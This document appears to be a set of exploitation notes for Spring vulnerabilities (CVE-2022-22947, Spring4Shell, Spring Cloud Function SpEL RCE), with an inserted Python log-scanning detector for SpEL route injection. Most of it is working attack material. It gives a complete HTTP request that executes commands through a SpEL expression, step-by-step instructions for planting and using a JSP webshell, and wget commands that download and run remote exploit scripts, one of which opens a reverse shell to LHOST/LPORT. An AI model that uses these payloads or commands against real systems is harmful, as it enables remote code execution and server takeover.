Cloud Gateway RCE - CVE-2022-22947

References:

<https://tanzu.vmware.com/security/cve-2022-22947>
<https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>

POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
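
A defender-side check for the request shape above, added here as an example and not taken from the referenced advisory or repositories: it scans a logged POST to `/actuator/gateway/routes/{id}` for string values wrapped in `#{...}` and marks those that also contain a SpEL type reference `T(...)`. The function names, finding labels and sample bodies are constructed for illustration.

```python
import json
import re

# Assumption: the input is the method, URI and JSON body of a request
# recovered from a proxy or WAF log.
SPEL_WRAPPER = re.compile(r"^\s*#\{.*\}\s*$", re.DOTALL)
TYPE_REF = re.compile(r"\bT\s*\(")  # SpEL type reference, T(some.Class)
ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/[^/?]+")


def iter_strings(node, path="$"):
    """Yield (json_path, value) for every string in a decoded JSON document."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")


def audit_route_request(method, uri, body):
    """Return findings for one logged request; an empty list means clean."""
    if method.upper() != "POST" or not ROUTE_PATH.match(uri):
        return []
    try:
        route = json.loads(body)
    except json.JSONDecodeError:
        return [("$", "unparseable-body")]
    findings = []
    for path, value in iter_strings(route):
        if SPEL_WRAPPER.match(value):
            kind = "spel-type-reference" if TYPE_REF.search(value) else "spel-expression"
            findings.append((path, kind))
    return findings


# Constructed samples: a benign route, and one with the same shape as the
# request above but a harmless placeholder expression.
BENIGN = '{"id": "r1", "filters": [{"name": "AddResponseHeader", "args": {"name": "X-Env", "value": "prod"}}], "uri": "http://example.com"}'
SUSPECT = '{"id": "r2", "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{T(java.lang.String).valueOf(1)}"}}], "uri": "http://example.com"}'

if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(audit_route_request("POST", "/actuator/gateway/routes/demo", sample))
```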


The CVE-2022-22947 RCE is a GitHub repository by shakeman8



Spring4Shell - Proof Of Concept | Information

CVE-2022-22963 & CVE-2022-22965

Found an interesting PoC here: https://github.com/craig/SpringCore0day/blob/main/exp.py and https://twitter.com/vxunderground/status/1509170582469943303

1. Clone the sample repo from https://spring.io/guides/gs/handling-form-submission/
2. You can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial.
3. Modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy).
4. Build the war file :)
5. Install tomcat9 + java 11 (I did it on Ubuntu 20.04 via apt-get).
6. Deploy the war file.
7. Update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT.
8. Run the PoC (ignore the URL it gives you for the webshell): python3 exp.py --url http://your.ip.here:8080/handling-form-submission-complete/greeting
9. You should see the "tomcatwar.jsp" file now in webapps/handling-form-submission.
10. Hit http://your.ip.here:8080/handling-form-submission/tomcatwar.jsp?pwd=j&cmd=id to see the results.

https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE


wget <https://raw.githubusercontent.com/chaosec2021/Spring-cloud-function-SpEL-RCE/main/Spel_RCE_POC.py>; chmod +x Spel_RCE_POC.py;
**python3 Spel_RCE_POC.py url.txt**

wget <https://raw.githubusercontent.com/chaosec2021/Spring-cloud-function-SpEL-RCE/main/Spel_RCE_Bash_EXP.py>; chmod +x Spel_RCE_Bash_EXP.py;
**python3 Spel_RCE_Bash_EXP.py** <http://URL> LHOST LPORT